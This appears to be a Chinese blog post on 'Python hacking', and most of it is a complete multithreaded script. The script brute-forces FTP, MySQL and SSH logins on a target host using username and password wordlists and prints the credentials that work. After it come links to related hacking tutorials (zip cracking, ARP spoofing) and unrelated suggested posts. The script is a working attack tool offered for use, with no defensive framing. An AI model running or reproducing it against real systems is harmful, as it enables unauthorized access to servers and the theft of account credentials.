python黑客编程之端口爆破
#coding:utf-8 from optparse import OptionParser import time,re,sys,threading,Queue import ftplib,socket,MySQLdb,paramiko global host queue = Queue.Queue() #******************************************** #color #******************************************** class bcolors: OKBLUE = '\033[94m' FAIL = '\033[91m' ENDC = '\033[0m' #******************************************** #FTP爆破模块 #******************************************** class FtpBurp(threading.Thread): """docstring for ftp""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: user,pwd = self.queue.get() try: ftp = ftplib.FTP() ftp.connect(host,21,timeout=10) ftp.login(user,pwd) print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd) ftp.quit() except ftplib.all_errors: print bcolors.FAIL+'[*]'+user+'----'+pwd self.queue.task_done() #******************************************** #MySql爆破模块 #******************************************** class MySql(threading.Thread): def __init__(self,queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: user,pwd = self.queue.get() try: conn = MySQLdb.connect(host=host, user=user,passwd=pwd,db='mysql',port=3306) print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd) if conn: conn.close() except MySQLdb.Error, msg: print bcolors.FAIL+'[*]'+user+'----'+pwd self.queue.task_done() #******************************************** #SSH爆破模块 #******************************************** class SSH(threading.Thread): """docstring for SSH""" def __init__(self,queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: user,pwd = self.queue.get() try: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(host,22,user,pwd,timeout=5) print bcolors.OKBLUE+'[!]\nsuccessful---username:%s --password:%s\n' % (user,pwd) ssh.close() exit() except Exception,e: print bcolors.FAIL+'[*]'+user+'----'+pwd self.queue.task_done() #******************************************** #可添加web后台爆破 #******************************************** usage = 'Usage: %prog [-t target] [-m method]' parser = OptionParser(usage) parser.add_option('-t', dest='target', help='host') parser.add_option('-m', dest='method', help='ways') parser.add_option('-u', dest='username', help='username') parser.add_option('-U', dest='usernamedic', help='username') parser.add_option('-P', dest='passworddic', help='password') parser.add_option('-n', dest='threading', help='Thread') (options, args) = parser.parse_args() if options.target == None: parser.print_help() sys.exit(0) if options.threading: n = int(options.threading) else: n = 5 if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', options.target): host = options.target else : host = socket.gethostbyname(options.target) print 'target: %s \n' % host if options.username : userlist[0] = options.username print 'username: %s' % options.username elif options.usernamedic: userlist = [j.strip() for j in open(options.usernamedic)] print 'username_number: %d $\n' % len(userlist) passlist = [j.strip() for j in open(options.passworddic)] print 'password_number: %d $\n' % len(passlist) if options.method == 'ftp': for i in range(n): m_ftp = FtpBurp(queue) m_ftp.setDaemon(True) m_ftp.start() for user in userlist: for pwd in passlist: queue.put((user,pwd)) if options.method == 'mysql': for i in range(n): m_sql = MySql(queue) m_sql.setDaemon(True) m_sql.start() for user in userlist: for pwd in passlist: queue.put((user,pwd)) if options.method == 'ssh': for i in range(n): m_ssh = SSH(queue) m_ssh.setDaemon(True) m_ssh.start() for user in userlist: for pwd in passlist: queue.put((user,pwd)) queue.join()
python黑客编程之端口爆破的更多相关文章
- Python黑客编程2 入门demo--zip暴力破解
Python黑客编程2 入门demo--zip暴力破解 上一篇文章,我们在Kali Linux中搭建了基本的Python开发环境,本篇文章为了拉近Python和大家的距离,我们写一个暴力破解zip包密 ...
- 《Python黑客编程之极速入门》正式开课
玄魂 玄魂工作室 今天 之前开启了一个<Python黑客编程>的系列,后来中断了,内容当时设置的比较宽,不太适合入门.现在将其拆分成两个系列<Python黑客编程之极速入门>和 ...
- Python黑客编程基础3网络数据监听和过滤
网络数据监听和过滤 课程的实验环境如下: • 操作系统:kali Linux 2.0 • 编程工具:Wing IDE • Python版本:2.7.9 • 涉及 ...
- Python黑客编程ARP欺骗
Python灰帽编程 3.1 ARP欺骗 ARP欺骗是一种在局域网中常用的攻击手段,目的是让局域网中指定的(或全部)的目标机器的数据包都通过攻击者主机进行转发,是实现中间人攻击的常用手段,从而实现数据 ...
- 电子书推荐--《Python灰帽子》,python黑客编程
点此在线阅读 <Python灰帽子>是由知名安全机构Immunity Inc的资深黑帽Justin Seitz主笔撰写的一本关于编程语言Python如何被广泛应用于黑客与逆向工程领域的书籍 ...
- Python黑客编程知识点整理
Python转义字符 转义字符 意义 ASCII码值(十进制) \a 响铃(BEL) 007 \b 退格(BS) ,将当前位置移到前一列 008 \f 换页(FF),将当前位置移到下页开头 012 \ ...
- Python 黑客相关电子资源和书籍推荐
原创 2017-06-03 玄魂工作室 玄魂工作室 继续上一次的Python编程入门的资源推荐,本次为大家推荐的是Python网络安全相关的资源和书籍. 在去年的双11送书的时候,其实送过几本Pyth ...
- python网络编程01 /C/S架构|B/S架构、网络通信原理、五层协议、七层协议简述、端口映射技术
python网络编程01 /C/S架构|B/S架构.网络通信原理.五层协议.七层协议简述.端口映射技术 目录 python网络编程01 /C/S架构|B/S架构.网络通信原理.五层协议.七层协议简述. ...
- Python 网络编程(一)
Python 网络编程 socket通常也称作"套接字",用于描述IP地址和端口,是一个通信链的句柄,应用程序通常通过"套接字"向网络发出请求或者应答网络请求. ...
随机推荐
- Sharepoint学习笔记—习题系列--70-576习题解析 -(Q1-Q3)
这里我把从网上搜集到的针对Sharepoint 70-576的有关练习进行系统的解析,整理成一个系列, 分期.分批次共享出来,供大家研究. 70-573考试注重的是"知道"相关知识 ...
- Objective-C 快速入门--基础(二)
1.什么是继承?OC中的继承有哪些特点? “继承”是面向对象软件技术当中的一个概念.如果一个类A继承自另一个类B,就把这个A称为"B的子类",而把B称为"A的父类&quo ...
- XML解析方案
在iOS中,解析XML的手段有很多 苹果原生 NSXMLParser:SAX方式解析,使用简单 第三方框架 libxml2:纯C语言,默认包含在iOS SDK中,同时支持DOM和SAX方式解析 GDa ...
- 文件与目录的rwx权限
r(Read,读取):对文件而言,具有读取文件内容的权限:对目录来说,具有浏览目录的权限. w(Write,写入):对文件而言,具有新增.修改文件内容的权限:对目录来说,具有删除.移动目录内文件的权限 ...
- HTML5 respond.js 解决IE6~8的响应式布局问题
HTML5 respond.js 解决IE6~8的响应式布局问题 响 应式布局,理想状态是,对PC/移动各种终端进行响应.媒体查询的支持程度是IE9+以及其他现代的浏览器,但是IE8在市场当中仍然 ...
- webapp设置适应pc和手机的页面宽高以及布局层叠图片文字
<!DOCTYPE html> <html lang="zh-cn"> <head> <title>我趣旅行网-美剧迷</ti ...
- yii2增加验证码详细步骤
作者:白狼 出处:http://www.manks.top/article/yii2_captcha本文版权归作者,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留 ...
- Percona XtraBackup User Manual 阅读笔记
XtraBackup XtraBackup 2 安装XtraBackup 2.1 安装XtraBackup binary版本 2.1.1 yum的安装方法: 2.1.2 直接下载rpm包安装 3 Xt ...
- 记录一些在用wcf的过程中走过的泥巴路 【第一篇】
自从转移战场之后,比以前忙多了,博客也没能及时跟上,原本准备继续mvc系列,但是在那边技术比较陈旧还没能用得上,话说有3年没接触这玩意了,东西也 都忘了差不多了,既然再次接触,我也就继续温习温习,记录 ...
- 京东MySQL监控之Zabbix优化、自动化
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否则将追究法律责任.http://wangwei007.blog.51cto.com/68019/1833332 随 ...